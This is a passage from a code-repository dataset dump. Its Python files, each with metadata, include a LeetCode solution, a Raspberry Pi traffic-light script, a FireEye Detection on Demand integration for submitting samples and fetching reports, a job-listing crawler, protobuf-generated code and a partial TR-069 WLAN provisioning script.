asAdapterForTypes=[MethodType]
)
def __init__(self, ob):
self.funcSig = adapt(ob.im_func, ISignature)
self.offset = ob.im_self is not None
self.subject = ob
def getPositionalArgs(self):
return self.funcSig.getPositionalArgs()[self.offset:]
def getPositionalArgs(ob):
return adapt(ob,ISignature).getPositionalArgs()
| [
"[email protected]"
] | |
4cf2a8b84c3cdd0ebae529ac5397255b44f2e9ee | 5f2103b1083b088aed3f3be145d01a770465c762 | /406. Queue Reconstruction by Height.py | 54dbb0fb8a1dbe5530f49b27d210c81d690d7a0e | [] | no_license | supersj/LeetCode | 5605c9bcb5ddcaa83625de2ad9e06c3485220019 | 690adf05774a1c500d6c9160223dab7bcc38ccc1 | refs/heads/master | 2021-01-17T17:23:39.585738 | 2017-02-27T15:08:42 | 2017-02-27T15:08:42 | 65,526,089 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,520 | py | from operator import itemgetter
# todo insert order thinking
class Solution1(object):
def reconstructQueue(self, people):
"""
:type people: List[List[int]]
:rtype: List[List[int]]
"""
people.sort(key = itemgetter(1,0))
result = []
start = 0
for ele in people:
if ele[1] == 0:
result.append(ele)
start += 1
else:
break
_last = start
_lastlevel = 0
for i in range(start,len(people)):
cnt = people[i][1]
if cnt != _lastlevel:
_last = 0
_lastlevel = cnt
_index = 0
for num in result:
if cnt == 0:
break
if num[0] >= people[i][0]:
cnt -= 1
_index += 1
_last = max(_last+1,_index)
result.insert(_last,people[i])
return result
class Solution(object):
def reconstructQueue(self, people):
"""
:type people: List[List[int]]
:rtype: List[List[int]]
"""
people.sort(key = lambda x: x[1])
people.sort(key = lambda x: x[0],reverse= True)
result = []
print(people)
for ele in people:
result.insert(ele[1],ele)
return result
p = [[8,2],[4,2],[4,5],[2,0],[7,2],[1,4],[9,1],[3,1],[9,0],[1,0]]
hh = Solution()
hh.reconstructQueue(p) | [
"[email protected]"
] | |
a52de2fb1424ea5d399877b53b6f048575a62dee | c7a1c1ae40e9d95dfb92251dcfbf3c5010e6ba81 | /essentials-gpiozero/02-LEDBasics/ch2listing4.py | 182bec077a8cdc43f6efc791966c9e6f6b7cdd87 | [] | no_license | pranavlathigara/Raspberry-Pi-DIY-Projects | efd18e2e5b9b8369bb1a5f5418782480cf9bc729 | 0c14c316898d4d06015912ac4a8cb7b71a3980c0 | refs/heads/master | 2021-04-06T09:14:28.088223 | 2018-02-19T00:15:22 | 2018-02-19T00:15:22 | 124,649,553 | 1 | 2 | null | 2018-03-10T11:30:59 | 2018-03-10T11:30:59 | null | UTF-8 | Python | false | false | 953 | py | from gpiozero import TrafficHat
from time import sleep
th = TrafficHat()
try:
while True:
# Traffic light code
# First, turn the green LED on
th.lights.green.on()
print(“Press the button to stop the lights!”)
# Next, we want to wait until the button is pressed
while(th.button.is_pressed == False):
#While not pressed do nothing
pass
# Button has been pressed!
th.lights.green.off()
# Amber on for a couple of seconds
th.lights.amber.on()
sleep(2)
th.lights.amber.off()
# Turn the red on
th.lights.red.on()
# Buzz the buzzer 20 times with 0.1 second intervals
th.buzzer.blink(0.1,0.1,20,False)
sleep(1)
th.lights.red.off()
# Red off and blink amber 4 times with 0.5 second intervals
th.lights.amber.blink(0.5,0.5,4,False)
except KeyboardInterrupt:
exit() | [
"[email protected]"
] | |
5e97ee335b85ed1562ba97122a365eef2a05f7ff | 2a1b8a671aceda6bc446f8ce26400aa84fa444a6 | /Packs/FireEye-Detection-on-Demand/Integrations/FireEye-Detection-on-Demand/FireEye-Detection-on-Demand.py | b969be415dd9b367021b7757c9c76ce0e0c6acb4 | [
"MIT"
] | permissive | demisto/content | 6d4722d46f0ff0beea2748e9f7de585bf91a78b4 | 890def5a0e0ae8d6eaa538148249ddbc851dbb6b | refs/heads/master | 2023-09-04T00:02:25.618032 | 2023-09-03T21:56:22 | 2023-09-03T21:56:22 | 60,525,392 | 1,023 | 1,921 | MIT | 2023-09-14T20:55:24 | 2016-06-06T12:17:02 | Python | UTF-8 | Python | false | false | 15,153 | py | import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
from typing import Any, Dict, List, Optional, Tuple
import dateparser
import urllib3
# Disable insecure warnings
urllib3.disable_warnings()
''' CONSTANTS '''
DATE_FORMAT = '%Y-%m-%dT%H:%M:%SZ'
''' CLIENT CLASS '''
class Client(BaseClient):
"""Client class to interact with the service API
This Client implements API calls, and does not contain any Demisto logic.
Should only do requests and return data.
It inherits from BaseClient defined in CommonServer Python.
Most calls use _http_request() that handles proxy, SSL verification, etc.
For this HelloWorld implementation, no special attributes defined
"""
def get_file_reputation(self, file: str) -> Dict[str, Any]:
return self._http_request(
method='GET',
url_suffix=f'/hashes/{file}'
)
def get_health(self) -> Dict[str, Any]:
return self._http_request(
method='GET',
url_suffix='/health'
)
def submit_file(self, files: Dict[str, Any], data: Dict[str, Any]) -> Dict[str, Any]:
return self._http_request(
method='POST',
url_suffix='/files',
files=files,
data=data
)
def submit_urls(self, data: Dict[str, Any]) -> Dict[str, Any]:
return self._http_request(
method='POST',
url_suffix='/urls',
files=data,
data=None
)
def get_report_url(self, report_id: str, expiration: int) -> Dict[str, Any]:
return self._http_request(
method='GET',
url_suffix=f'/presigned-url/{report_id}',
params={
'expiry': expiration
}
)
def report_status(self, report_id: str, extended: str) -> Dict[str, Any]:
return self._http_request(
method='GET',
url_suffix=f'/reports/{report_id}',
params={
'extended': extended
}
)
def report_artifact(self, report_id: str, artifact_type: str) -> Dict[str, Any]:
return self._http_request(
method='GET',
url_suffix=f'/artifacts/{report_id}',
params={
'type': artifact_type,
},
resp_type='content'
)
''' HELPER FUNCTIONS '''
def convert_to_demisto_severity(severity: str) -> int:
# In this case the mapping is straightforward, but more complex mappings
# might be required in your integration, so a dedicated function is
# recommended. This mapping should also be documented.
return {
'Low': 1, # low severity
'Medium': 2, # medium severity
'High': 3, # high severity
'Critical': 4 # critical severity
}[severity]
def arg_to_int(arg: Any, arg_name: str, required: bool = False) -> Optional[int]:
if arg is None:
if required is True:
raise ValueError(f'Missing "{arg_name}"')
return None
if isinstance(arg, str):
if arg.isdigit():
return int(arg)
raise ValueError(f'Invalid number: "{arg_name}"="{arg}"')
if isinstance(arg, int):
return arg
raise ValueError(f'Invalid number: "{arg_name}"')
def arg_to_timestamp(arg: Any, arg_name: str, required: bool = False) -> Optional[int]:
if arg is None:
if required is True:
raise ValueError(f'Missing "{arg_name}"')
return None
if isinstance(arg, str) and arg.isdigit():
# timestamp is a str containing digits - we just convert it to int
return int(arg)
if isinstance(arg, str):
# we use dateparser to handle strings either in ISO8601 format, or
# relative time stamps.
# For example: format 2019-10-23T00:00:00 or "3 days", etc
date = dateparser.parse(arg, settings={'TIMEZONE': 'UTC'})
if date is None:
# if d is None it means dateparser failed to parse it
raise ValueError(f'Invalid date: {arg_name}')
return int(date.timestamp())
if isinstance(arg, (int, float)):
# Convert to int if the input is a float
return int(arg)
raise ValueError(f'Invalid date: "{arg_name}"')
''' COMMAND FUNCTIONS '''
def test_module(client: Client) -> str:
# INTEGRATION DEVELOPER TIP
# Client class should raise the exceptions, but if the test fails
# the exception text is printed to the Cortex XSOAR UI.
# If you have some specific errors you want to capture (i.e. auth failure)
# you should catch the exception here and return a string with a more
# readable output (for example return 'Authentication Error, API Key
# invalid').
# Cortex XSOAR will print everything you return different than 'ok' as
# an error
try:
#
client.get_health()
except DemistoException as e:
if 'Forbidden' in str(e):
return 'Authorization Error: make sure API Key is correctly set'
else:
raise e
return 'ok'
def get_hashes_command(client: Client, args: Dict[str, Any]) -> Tuple[str, dict, Any]:
hashes = argToList(args.get('md5_hashes'))
if len(hashes) == 0:
raise ValueError('hash(es) not specified')
for hash in hashes:
if md5Regex.match(hash):
continue
raise Exception('Invalid hash. Only MD5 is supported.')
dbot_score_list: List[Dict[str, Any]] = []
file_standard_list: List[Dict[str, Any]] = []
file_data_list: List[Dict[str, Any]] = []
for hash in hashes:
file_data = client.get_file_reputation(hash)
file_data['MD5'] = file_data['md5']
del file_data['md5']
# demisto.results(file_data)
engines = file_data.get('engine_results', {})
for key in engines.keys():
if engines[key].get('sha256'):
file_data['SHA256'] = engines[key].get('sha256')
del engines[key]['sha256']
# If the outer `is_malicious` is set to True, assume the score should be bad
# Otherwise, default to unknown unless at least one engine has returned a verdict besides `not_found`
if file_data['is_malicious']:
score = 3 # bad
else:
score = 0 # unknown
for key in engines.keys():
verdict = engines[key].get('verdict', 'not_found')
if verdict != "not_found" and verdict != "malicious":
score = 1 # good
break
dbot_score = {
'Indicator': hash,
'Vendor': 'FireEye DoD',
'Type': 'file',
'Score': score
}
file_standard_context = {
'MD5': hash,
}
if score == 3:
# if score is bad must add DBotScore Vendor and Description
file_standard_context['Malicious'] = {
'Vendor': 'FireEye DoD'
}
filedata = {}
filedata['FireEyeDoD'] = file_data
filedata['MD5'] = file_data['MD5']
del filedata['FireEyeDoD']['MD5']
if file_data.get('SHA256'):
dbot_score_sha256 = {
'Indicator': file_data.get('SHA256'),
'Vendor': 'FireEye DoD',
'Type': 'file',
'Score': score
}
dbot_score_list.append(dbot_score_sha256)
filedata['SHA256'] = file_data['SHA256']
file_standard_context['SHA256'] = file_data['SHA256']
del filedata['FireEyeDoD']['SHA256']
file_standard_list.append(file_standard_context)
dbot_score_list.append(dbot_score)
file_data_list.append(filedata)
outputs = {
'DBotScore(val.Vendor == obj.Vendor && val.Indicator == obj.Indicator)': dbot_score_list,
outputPaths['file']: file_standard_list,
'File(val.MD5 == obj.MD5 || val.SHA256 == obj.SHA256)': file_data_list
}
readable_output = tableToMarkdown('FireEye DoD Results', file_standard_list, headers=["MD5", "SHA256", "Malicious"])
return (
readable_output,
outputs,
file_data_list
)
def generate_report_url(client: Client, args: Dict[str, Any]) -> Tuple[str, dict, dict]:
report_id = str(args.get('report_id'))
expiration = arg_to_int(arg=args.get('expiration'), arg_name='expiration', required=True)
if expiration:
if expiration < 1 or expiration > 8760:
raise ValueError('Expiration must be between 1 and 8760 hours.')
else:
raise ValueError('Expiration not specified or not a number.')
report = client.get_report_url(report_id=report_id, expiration=expiration)
presigned_report_url = report.get('presigned_report_url')
readable_output = f'Report {report_id} is available [here]({presigned_report_url})'
return (
readable_output,
{},
report
)
def submit_file_command(client: Client, args: Dict[str, Any]) -> Tuple[str, dict, dict]:
entry_id = demisto.args().get('entryID')
file_entry = demisto.getFilePath(entry_id) # .get('path')
file_name = file_entry['name']
file_path = file_entry['path']
files = {'file': (file_name, open(file_path, 'rb'))}
# Optional parameters to send along with the file
optional_params = ['password', 'param', 'screenshot', 'video', 'fileExtraction', 'memoryDump', 'pcap']
data = {}
for param in optional_params:
value = demisto.args().get(param)
if value:
data[param] = value
scan = client.submit_file(files=files, data=data)
scan['filename'] = file_name
del scan['status']
scan['overall_status'] = 'RUNNING'
report_id = scan.get('report_id')
readable_output = (
f'Started analysis of {file_name} with FireEye Detection on Demand.'
f'Results will be published to report id: {report_id}'
)
outputs = {
'FireEyeDoD.Scan(val.report_id == obj.report_id)': scan
}
return (
readable_output,
outputs,
scan
)
def submit_urls_command(client: Client, args: Dict[str, Any]) -> Tuple[str, dict, dict]:
urls = argToList(args.get('urls'))
if len(urls) == 0:
raise ValueError('hash(es) not specified')
# Format the URLs into a string list, which the API understands
formatted_urls = "[" + ",".join(list(map(lambda url: url.replace(url, f'"{url}"'), urls))) + "]"
data = {'urls': formatted_urls}
scan = client.submit_urls(data=data)
del scan['status']
scan['overall_status'] = 'RUNNING'
report_id = scan.get('report_id')
readable_output = (
f'Started analysis of {urls} with FireEye Detection on Demand.'
f'Results will be published to report id: {report_id}'
)
outputs = {
'FireEyeDoD.Scan(val.report_id == obj.report_id)': scan
}
return (
readable_output,
outputs,
scan
)
def get_reports_command(client: Client, args: Dict[str, Any]) -> Tuple[str, dict, Any]:
report_id_list = argToList(args.get('report_ids', []))
extended = args.get('extended_report', "False")
screenshot = args.get('get_screenshot', "false")
artifact = args.get('get_artifact', "")
if len(report_id_list) == 0:
raise ValueError('report_id(s) not specified')
report_list: List[Dict[str, Any]] = []
for report_id in report_id_list:
report = client.report_status(report_id=report_id, extended=extended)
if screenshot.lower() == "true":
screenshot = client.report_artifact(report_id=report_id, artifact_type="screenshot")
stored_img = fileResult('screenshot.gif', screenshot)
demisto.results({'Type': entryTypes['image'], 'ContentsFormat': formats['text'],
'File': stored_img['File'], 'FileID': stored_img['FileID'], 'Contents': ''})
if artifact != "":
artifacts = client.report_artifact(report_id=report_id, artifact_type=artifact)
stored_artifacts = fileResult('artifacts.zip', artifacts)
demisto.results({'Type': entryTypes['file'], 'ContentsFormat': formats['text'],
'File': stored_artifacts['File'], 'FileID': stored_artifacts['FileID'], 'Contents': ''})
report_list.append(report)
readable_output = tableToMarkdown('Scan status', report_list)
outputs = {
'FireEyeDoD.Scan(val.report_id == obj.report_id)': report_list
}
return (
readable_output,
outputs,
report_list
)
''' MAIN FUNCTION '''
def main() -> None:
"""main function, parses params and runs command functions
:return:
:rtype:
"""
api_key = demisto.params().get('apikey')
# get the service API url
base_url = demisto.params()['url']
# if your Client class inherits from BaseClient, SSL verification is
# handled out of the box by it, just pass ``verify_certificate`` to
# the Client constructor
verify_certificate = not demisto.params().get('insecure', False)
# if your Client class inherits from BaseClient, system proxy is handled
# out of the box by it, just pass ``proxy`` to the Client constructor
proxy = demisto.params().get('proxy', False)
# INTEGRATION DEVELOPER TIP
# You can use functions such as ``demisto.debug()``, ``demisto.info()``,
# etc. to print information in the XSOAR server log. You can set the log
# level on the server configuration
# See: https://xsoar.pan.dev/docs/integrations/code-conventions#logging
demisto.debug(f'Command being called is {demisto.command()}')
try:
headers = {
'feye-auth-key': f'{api_key}'
}
client = Client(
base_url=base_url,
verify=verify_certificate,
headers=headers,
proxy=proxy)
if demisto.command() == 'test-module':
# This is the call made when pressing the integration Test button.
result = test_module(client)
demisto.results(result)
elif demisto.command() == 'fireeye-dod-get-hashes':
return_outputs(*get_hashes_command(client, demisto.args()))
elif demisto.command() == 'fireeye-dod-get-reports':
return_outputs(*get_reports_command(client, demisto.args()))
elif demisto.command() == 'fireeye-dod-submit-file':
return_outputs(*submit_file_command(client, demisto.args()))
elif demisto.command() == 'fireeye-dod-submit-urls':
return_outputs(*submit_urls_command(client, demisto.args()))
elif demisto.command() == 'fireeye-dod-get-report-url':
return_outputs(*generate_report_url(client, demisto.args()))
# Log exceptions and return errors
except Exception as e:
raise e
# demisto.error(traceback.format_exc()) # print the traceback
# return_error(f'Failed to execute {demisto.command()} command.\nError:\n{str(e)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| [
"[email protected]"
] | |
1f330a243eabf5b8c046f3eeffcee642a856d548 | 0937646b6ce9249a8d193987f308ce398dc28bd1 | /104API/104API.py | 5ec24357b53855d4c9189223fbb28b268e8829ff | [] | no_license | barry800414/JobTitleNLP | 98622d02b25b1418f28698f7d772c8de96642032 | b379c2052447e6483d17f5db51fb918b37ac7a52 | refs/heads/master | 2021-06-08T19:36:39.044757 | 2016-10-21T03:11:10 | 2016-10-21T03:11:10 | 66,043,111 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,863 | py | #!/usr/bin/env python3
# invoke 104 API to get all 104 jobs
import sys
import requests
import json
from getCat import getL3ID
API_URL = "http://www.104.com.tw/i/apis/jobsearch.cfm"
def getJobsByCatID(catID, verbose=0):
jobs = dict()
payload = {
"cat": catID,
"role": 1,
"fmt": 8,
"cols": "J"
}
try:
r = requests.get(API_URL, params = payload)
if verbose >= 1:
print(r.url, r.status_code)
p = r.json()
nPage = int(p['TOTALPAGE'])
for i in range(0, nPage):
jobs.update(__getJobsByCatID(catID, i+1, verbose))
except Exception as e:
print(e, file=sys.stderr)
return jobs
def __getJobsByCatID(catID, page, verbose=0):
jobs = dict()
payload = {
"cat": catID,
"role": 1,
"fmt": 8,
"cols": "J,JOB,JOBCAT_DESCRIPT,NAME",
"page": page
}
try:
r = requests.get(API_URL, params = payload)
if verbose >= 2:
print(r.url, r.status_code)
p = r.json()
for d in p['data']:
cat = [c for c in d['JOBCAT_DESCRIPT'].split('@') if c != "類目"]
jobs[d['J']] = { "title": d['JOB'], "cat": cat, 'company_name': d['NAME'] }
except Exception as e:
print(e, file=sys.stderr)
return jobs
if __name__ == '__main__':
if len(sys.argv) != 3:
print('Usage:', sys.argv[0], 'category outJsonFile', file=sys.stderr)
exit(-1)
with open(sys.argv[1], 'r') as f:
rawCat = json.load(f)
cat = getL3ID(rawCat)
# all job category ids
allJobs = dict()
for i, (catID, catName) in enumerate(cat.items()):
print('(%d/%d) Start crawling Category %s(%s):' % (i+1, len(cat), catName, catID), end='', flush=True)
jobs = getJobsByCatID(catID)
print('%d' % len(jobs), flush=True)
allJobs[catName] = jobs
with open(sys.argv[2], 'w') as f:
json.dump(allJobs, f, indent=1, ensure_ascii=False)
| [
"[email protected]"
] | |
a3ddfd87f910aeddaeb2fdccc180e2928ab42be7 | bc441bb06b8948288f110af63feda4e798f30225 | /object_store_sdk/model/notify/subscriber_pb2.py | 692c20775b418cfdc51ab0f6e6720297f4eb1271 | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | true | 5,376 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: subscriber.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from object_store_sdk.model.notify import subscribe_info_pb2 as object__store__sdk_dot_model_dot_notify_dot_subscribe__info__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='subscriber.proto',
package='notify',
syntax='proto3',
serialized_options=_b('[email protected]/contracts/protorepo-models/easyops/model/notify'),
serialized_pb=_b('\n\x10subscriber.proto\x12\x06notify\x1a\x32object_store_sdk/model/notify/subscribe_info.proto\"\xab\x01\n\nSubscriber\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05\x61\x64min\x18\x02 \x01(\t\x12\x10\n\x08\x63\x61llback\x18\x03 \x01(\t\x12\x0f\n\x07\x65nsName\x18\x04 \x01(\t\x12\x0f\n\x07procNum\x18\x05 \x01(\x05\x12\x0f\n\x07msgType\x18\x06 \x01(\x05\x12\r\n\x05retry\x18\x07 \x01(\x05\x12,\n\rsubscribeInfo\x18\x08 \x03(\x0b\x32\[email protected]/contracts/protorepo-models/easyops/model/notifyb\x06proto3')
,
dependencies=[object__store__sdk_dot_model_dot_notify_dot_subscribe__info__pb2.DESCRIPTOR,])
_SUBSCRIBER = _descriptor.Descriptor(
name='Subscriber',
full_name='notify.Subscriber',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='notify.Subscriber.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='admin', full_name='notify.Subscriber.admin', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='callback', full_name='notify.Subscriber.callback', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ensName', full_name='notify.Subscriber.ensName', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='procNum', full_name='notify.Subscriber.procNum', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='msgType', full_name='notify.Subscriber.msgType', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='retry', full_name='notify.Subscriber.retry', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='subscribeInfo', full_name='notify.Subscriber.subscribeInfo', index=7,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=81,
serialized_end=252,
)
_SUBSCRIBER.fields_by_name['subscribeInfo'].message_type = object__store__sdk_dot_model_dot_notify_dot_subscribe__info__pb2._SUBSCRIBEINFO
DESCRIPTOR.message_types_by_name['Subscriber'] = _SUBSCRIBER
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Subscriber = _reflection.GeneratedProtocolMessageType('Subscriber', (_message.Message,), {
'DESCRIPTOR' : _SUBSCRIBER,
'__module__' : 'subscriber_pb2'
# @@protoc_insertion_point(class_scope:notify.Subscriber)
})
_sym_db.RegisterMessage(Subscriber)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
40dcbecf7f281aed9dcb30300876afe764f694bd | 0c1d6b8dff8bedfffa8703015949b6ca6cc83f86 | /lib/worklists/operator/CT/v3.0/business/VDSL_4+2/WLAN_Multi/script.py | 9a9b6c6cbee9a6edf93585bdaa4fbf2b5d34cecf | [] | no_license | samwei8/TR069 | 6b87252bd53f23c37186c9433ce4d79507b8c7dd | 7f6b8d598359c6049a4e6cb1eb1db0899bce7f5c | refs/heads/master | 2021-06-21T11:07:47.345271 | 2017-08-08T07:14:55 | 2017-08-08T07:14:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,798 | py | #coding:utf-8
# -----------------------------rpc --------------------------
import os
import sys
DEBUG_UNIT = False
if (DEBUG_UNIT):
g_prj_dir = os.path.dirname(__file__)
parent1 = os.path.dirname(g_prj_dir)
parent2 = os.path.dirname(parent1)
parent3 = os.path.dirname(parent2)
parent4 = os.path.dirname(parent3) # tr069v3\lib
parent5 = os.path.dirname(parent4) # tr069v3\
sys.path.insert(0, parent4)
sys.path.insert(0, os.path.join(parent4, 'common'))
sys.path.insert(0, os.path.join(parent4, 'worklist'))
sys.path.insert(0, os.path.join(parent4, 'usercmd'))
sys.path.insert(0, os.path.join(parent5, 'vendor'))
from TR069.lib.common.event import *
from TR069.lib.common.error import *
from time import sleep
import TR069.lib.common.logs.log as log
g_prj_dir = os.path.dirname(__file__)
parent1 = os.path.dirname(g_prj_dir)
parent2 = os.path.dirname(parent1) # dir is system
try:
i = sys.path.index(parent2)
if (i !=0):
# stratege= boost priviledge
sys.path.pop(i)
sys.path.insert(0, parent2)
except Exception,e:
sys.path.insert(0, parent2)
import _Common
reload(_Common)
from _Common import *
import _WLANMulti
reload(_WLANMulti)
from _WLANMulti import WLANMulti
import _WLANMultiWANSetUP
reload(_WLANMultiWANSetUP)
from _WLANMultiWANSetUP import WLANMultiWANSetUP
def test_script(obj):
"""
"""
sn = obj.sn # 取得SN号
DeviceType = "VDSL" # 绑定tr069模板类型.只支持ADSL\LAN\EPON三种
rollbacklist = [] # 存储工单失败时需回退删除的实例.目前缺省是不开启回退
# 初始化日志
obj.dict_ret.update(str_result=u"开始执行工单:%s........\n" %
os.path.basename(os.path.dirname(__file__)))
# data传参
WEPKeyIndex = obj.dict_data.get("WEPKeyIndex")[0]
WEPEncryptionLevel = obj.dict_data.get("WEPEncryptionLevel")[0]
WEPKey = obj.dict_data.get("WEPKey")[0]
# WAN部分参数
PVC_OR_VLAN1 = obj.dict_data.get("PVC_OR_VLAN1")[0]
PVC_OR_VLAN2 = obj.dict_data.get("PVC_OR_VLAN2")[0]
PVC_OR_VLAN3 = obj.dict_data.get("PVC_OR_VLAN3")[0]
PVC_OR_VLAN4 = obj.dict_data.get("PVC_OR_VLAN4")[0]
Username1 = obj.dict_data.get("Username1")[0]
Password1 = obj.dict_data.get("Password1")[0]
Username2 = obj.dict_data.get("Username2")[0]
Password2 = obj.dict_data.get("Password2")[0]
WANEnable_Switch = obj.dict_data.get("WANEnable_Switch")[0]
# WLAN个数
Num = 4
BeaconType = 'Basic'
BasicAuthenticationMode = 'Both'
# LANDevice.{i}.WLANConfiguration.{i}.节点参数
dict_root = {'X_CT-COM_SSIDHide':[0, 'Null'],
'X_CT-COM_RFBand':[0, 'Null'],
'X_CT-COM_ChannelWidth':[0, 'Null'],
'X_CT-COM_GuardInterval':[0, 'Null'],
'X_CT-COM_RetryTimeout':[0, 'Null'],
'X_CT-COM_Powerlevel':[0, 'Null'],
'X_CT-COM_PowerValue':[0, 'Null'],
'X_CT-COM_APModuleEnable':[0, 'Null'],
'X_CT-COM_WPSKeyWord':[0, 'Null'],
'Enable':[1, '1'],
'Channel':[0, 'Null'],
'SSID':[0, 'Null'],
'BeaconType':[1, BeaconType],
'Standard':[0, 'Null'],
'WEPKeyIndex':[1, WEPKeyIndex],
'KeyPassphrase':[0, 'Null'],
'WEPEncryptionLevel':[1, WEPEncryptionLevel],
'BasicAuthenticationMode':[1, BasicAuthenticationMode],
'WPAEncryptionModes':[0, 'Null'],
'WPAAuthenticationMode':[0, 'Null'],
'IEEE11iEncryptionModes':[0, 'Null'],
'IEEE11iAuthenticationMode':[0, 'Null'],
'BasicDataTransmitRates':[0, 'Null'],
'OperationalDataTransmitRates':[0, 'Null']}
# WLANConfiguration.{i}.WEPKey.{i}.节点参数(WEP关心)
dict_WEPKey = {'WEPKey':[1, WEPKey]}
# WLANConfiguration.{i}.PreSharedKey.{i}.节点参数(WPA关心)
dict_PreSharedKey = {}
# 无线设置(第一个不修改,第二个设置为WEP,第三和第四个设置为不加密)
ret, ret_data = WLANMulti(obj, sn, Num, dict_root,
dict_WEPKey, dict_PreSharedKey={},
change_account=0,
rollbacklist=rollbacklist)
# 将工单脚本执行结果返回到OBJ的结果中
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data)
# 如果执行失败,统一调用回退机制(缺省是关闭的)
if ret == ERR_FAIL:
ret_rollback, ret_data_rollback = rollback(sn, rollbacklist, obj)
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data_rollback)
info = u"工单:%s执行结束\n" % os.path.basename(os.path.dirname(__file__))
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
return ret
# 直接新建四条WAN连接
# 第一条IP_Routed,PPPOE,INTERNET 绑定LAN1和WLAN1
# 第二条IP_Routed,PPPOE,INTERNET 绑定LAN2和WLAN3
# 第三条PPPoE_Bridged INTERNET 绑定LAN3和WLAN3
# 第四条PPPoE_Bridged INTERNET 绑定LAN4和WLAN4
LAN1 = 'InternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.1'
LAN2 = 'InternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.2'
LAN3 = 'InternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.3'
LAN4 = 'InternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.4'
WLAN1 = 'InternetGatewayDevice.LANDevice.1.WLANConfiguration.1'
WLAN2 = 'InternetGatewayDevice.LANDevice.1.WLANConfiguration.2'
WLAN3 = 'InternetGatewayDevice.LANDevice.1.WLANConfiguration.3'
WLAN4 = 'InternetGatewayDevice.LANDevice.1.WLANConfiguration.4'
# 第一条WAN的 WANDSLLinkConfig节点参数
if PVC_OR_VLAN1 == "":
PVC_OR_VLAN1_flag = 0
else:
PVC_OR_VLAN1_flag = 1
dict_wanlinkconfig1 = {'Enable':[1, '1'],
'Mode':[PVC_OR_VLAN1_flag, '2'],
'VLANIDMark':[PVC_OR_VLAN1_flag, PVC_OR_VLAN1]}
# 第一条WAN的WANPPPConnection节点参数
# 注意:X_CT-COM_IPMode节点有些V4版本没有做,所以不能使能为1.实际贝曼工单也是没有下发的
dict_wanpppconnection1 = {'Enable':[1, '1'],
'ConnectionType':[1, 'IP_Routed'],
'Name':[0, 'Null'],
'Username':[1, Username1],
'Password':[1, Password1],
'X_CT-COM_LanInterface':[1, LAN1+','+WLAN1],
'X_CT-COM_ServiceList':[1, 'INTERNET'],
'X_CT-COM_LanInterface-DHCPEnable':[0, 'Null']}
# 第二条WAN的 WANDSLLinkConfig节点参数
if PVC_OR_VLAN2 == "":
PVC_OR_VLAN2_flag = 0
else:
PVC_OR_VLAN2_flag = 1
dict_wanlinkconfig2 = {'Enable':[1, '1'],
'Mode':[PVC_OR_VLAN2_flag, '2'],
'VLANIDMark':[PVC_OR_VLAN2_flag, PVC_OR_VLAN2]}
# 第二条WAN的WANPPPConnection节点参数
